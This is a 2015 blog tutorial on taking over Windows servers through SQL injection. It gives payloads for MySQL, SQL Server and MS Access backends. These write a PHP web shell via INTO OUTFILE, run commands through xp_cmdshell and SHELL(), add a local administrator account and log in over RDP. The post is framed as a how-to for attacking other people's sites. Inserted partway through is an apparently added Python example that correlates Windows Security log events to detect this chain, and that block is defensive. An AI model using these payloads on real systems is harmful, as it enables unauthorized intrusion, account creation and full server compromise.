Sunday, 10 May 2015

owning windows server via sqli


                       ~~~~:::::BENZI Tutorials :::::~~~~~~

This tut will teach you how to get root-level (admin) access on win servers.

TOC
-mysql
-sql server
-msaccess

mysql
conditions:
-magic quotes off
-you have the full path of the web directory
-FILE privileges (needed for load_file / INTO OUTFILE)
**if you see error 13 (permission denied when writing the file), stop injecting.

let's say you found a vuln on a site, and the number of columns is 5.
for example:

Code:
site.com/index.php?id=1 union select 1,2,3,4,5
to know if it's a win server, do this
Code:
site.com/index.php?id=1 union select 1,2,version(),4,5
if you see something like
Quote:5.01.56-nt-log
it's windows, because of the "nt".
you can also do

Code:
site.com/index.php?id=1 union select 1,2,@@version_compile_os,4,5
now we will start injecting

Code:
union select 1,2,"<? system($_REQUEST['cmd']); ?>",4,5 INTO OUTFILE "/full/path/here/cmd.php"
explanation:
we have written a small script that runs cmd commands into the file "cmd.php".
in place of "/full/path/here" put the full path of the web directory, something like
/home/some_user/public_html/site/index.php
now we go to our file
site.com/cmd.php
you will see the numbers 1,2,4,5 because those are the union columns.
now, to execute cmd commands, we do it like this
site.com/cmd.php?cmd=[command here]
(the command "ls -la" lists all the files, for example)
now, we will add a new user.
site.com/cmd.php?cmd=net user uname upass /add
user added.
site.com/cmd.php?cmd=net localgroup administrators uname /add
we added our user to the admins.
now go to start > cmd
and ping the site
ping site.com
now you will see "Pinging ... [ip.ip.ip.ip] with 32 bytes of data:"
now, go to start > all programs > accessories > remote desktop connection
and type the ip from the ping
login with the user & pass we added
Pwnd..
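The chain described above (a local user created from the web server or database process, added to administrators, then used for an RDP login) leaves a clear trail in the Windows Security log. The following Python is an added example, not code from the tutorial; it correlates a constructed set of Security events in a simplified flat form (the field names `subject`, `target`, `group`, `member`, `logon_type`, `source_ip` are assumptions standing in for the event XML fields) using the standard event ids 4720 (user created), 4732 (member added to a local group) and 4624 with logon type 10 (RDP). The service account names are also constructed.

```python
from datetime import datetime, timedelta

# Constructed Security-log events (assumed flat field names; a real pipeline
# would map them from the event XML). Event ids are the standard ones:
# 4720 user created, 4732 member added to a security-enabled local group,
# 4624 logon (type 10 = RemoteInteractive, i.e. RDP).
EVENTS = [
    {"time": "2015-05-10T13:03:01", "id": 4720, "subject": "svc_mssql", "target": "uname"},
    {"time": "2015-05-10T13:03:30", "id": 4732, "subject": "svc_mssql",
     "group": "Administrators", "member": "uname"},
    {"time": "2015-05-10T13:09:12", "id": 4624, "logon_type": 10, "target": "uname",
     "source_ip": "203.0.113.7"},
    # Benign helpdesk activity on the same day, for contrast.
    {"time": "2015-05-10T09:00:00", "id": 4720, "subject": "helpdesk", "target": "jsmith"},
    {"time": "2015-05-10T09:00:20", "id": 4732, "subject": "helpdesk",
     "group": "Remote Desktop Users", "member": "jsmith"},
    {"time": "2015-05-10T15:00:00", "id": 4624, "logon_type": 2, "target": "jsmith",
     "source_ip": "-"},
]

# Identities that should never create local users: the database and web
# service accounts (constructed names for this example).
SERVICE_ACCOUNTS = frozenset({"svc_mssql", "svc_mysql", "IUSR_WEBSRV01"})


def _when(ev):
    return datetime.fromisoformat(ev["time"])


def correlate(events, service_accounts=SERVICE_ACCOUNTS, window=timedelta(minutes=30)):
    """Build one chain per 4720 event and score it: +2 if a service account
    created the user, +3 if the user joined Administrators within the window,
    +3 if an RDP logon for the user followed within the window."""
    chains = []
    for created in (e for e in events if e["id"] == 4720):
        t0 = _when(created)
        user = created["target"]
        chain = {"user": user, "created_by": created["subject"],
                 "created_at": created["time"], "admin_added": None,
                 "rdp_logon_from": None, "score": 0}
        if created["subject"] in service_accounts:
            chain["score"] += 2
        for ev in events:
            if not t0 <= _when(ev) <= t0 + window:
                continue
            if ev["id"] == 4732 and ev["member"] == user \
                    and ev["group"].lower() == "administrators":
                chain["admin_added"] = ev["time"]
                chain["score"] += 3
            elif ev["id"] == 4624 and ev["logon_type"] == 10 and ev["target"] == user:
                chain["rdp_logon_from"] = ev["source_ip"]
                chain["score"] += 3
        chains.append(chain)
    return sorted(chains, key=lambda c: c["score"], reverse=True)


def suspicious(chains, threshold=3):
    """Chains worth an alert: any admin-group add or RDP logon, or a
    service-account creation combined with anything else."""
    return [c for c in chains if c["score"] >= threshold]


if __name__ == "__main__":
    for c in suspicious(correlate(EVENTS)):
        print(c)
```

Even without the group change, a 4720 whose subject is the database or web service identity is by itself worth a ticket, because the tutorial's commands run as that process; the 30-minute window is an assumption and should be tuned to how quickly the environment's own provisioning tools act.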

sql server
conditions:
-win server 2000/2003
-exec on (xp_cmdshell enabled)

this process is shorter, because we can run cmd commands with xp_cmdshell.
let's start
let's say we know the file index.asp is vuln, for example

Code:
site.com/index.asp?id=1
so we do this
Code:
site.com/index.asp?id=(select+@@version)
and we will get an error like this
Quote:Syntax error...value 'microsoft sql server 2000....' to .....int.
so we know that the server is microsoft sql server 2000.
now, to run a cmd command, we do this

Code:
site.com/index.asp?id=1;exec+master..xp_cmdshell 'net user uname upass /add'--
**note: if you get an error, try this
Code:
site.com/index.asp?id=1;exec+master..xp_cmdshell "net user uname upass /add"--)
now, let's add our user to the admins.
Code:
site.com/index.asp?id=1;exec+master..xp_cmdshell 'net localgroup administrators uname /add'--
now, exactly as before, go to start > cmd
and ping the site
ping site.com
now you will see "Pinging ... [ip.ip.ip.ip] with 32 bytes of data:"
now, go to start > all programs > accessories > remote desktop connection
and type the ip from the ping
login with the user & pass we added
Pwnd..

ACCESS
conditions:
-JET db
msaccess is not so different from sql server.
if we know that the file index.asp is vuln, we do this to run cmd commands:

Code:
site.com/index.asp?id=1 AND SHELL('cmd.exe /c net user uname upass /add')
user added.
Code:
site.com/index.asp?id=1 AND SHELL('cmd.exe /c net localgroup administrators uname /add')
user added to the admins.
go to start > cmd
and ping the site
ping site.com
now you will see "Pinging ... [ip.ip.ip.ip] with 32 bytes of data:"
now, go to start > all programs > accessories > remote desktop connection
and type the ip from the ping
login with the user & pass we added
Pwnd..

hope you learned something :)

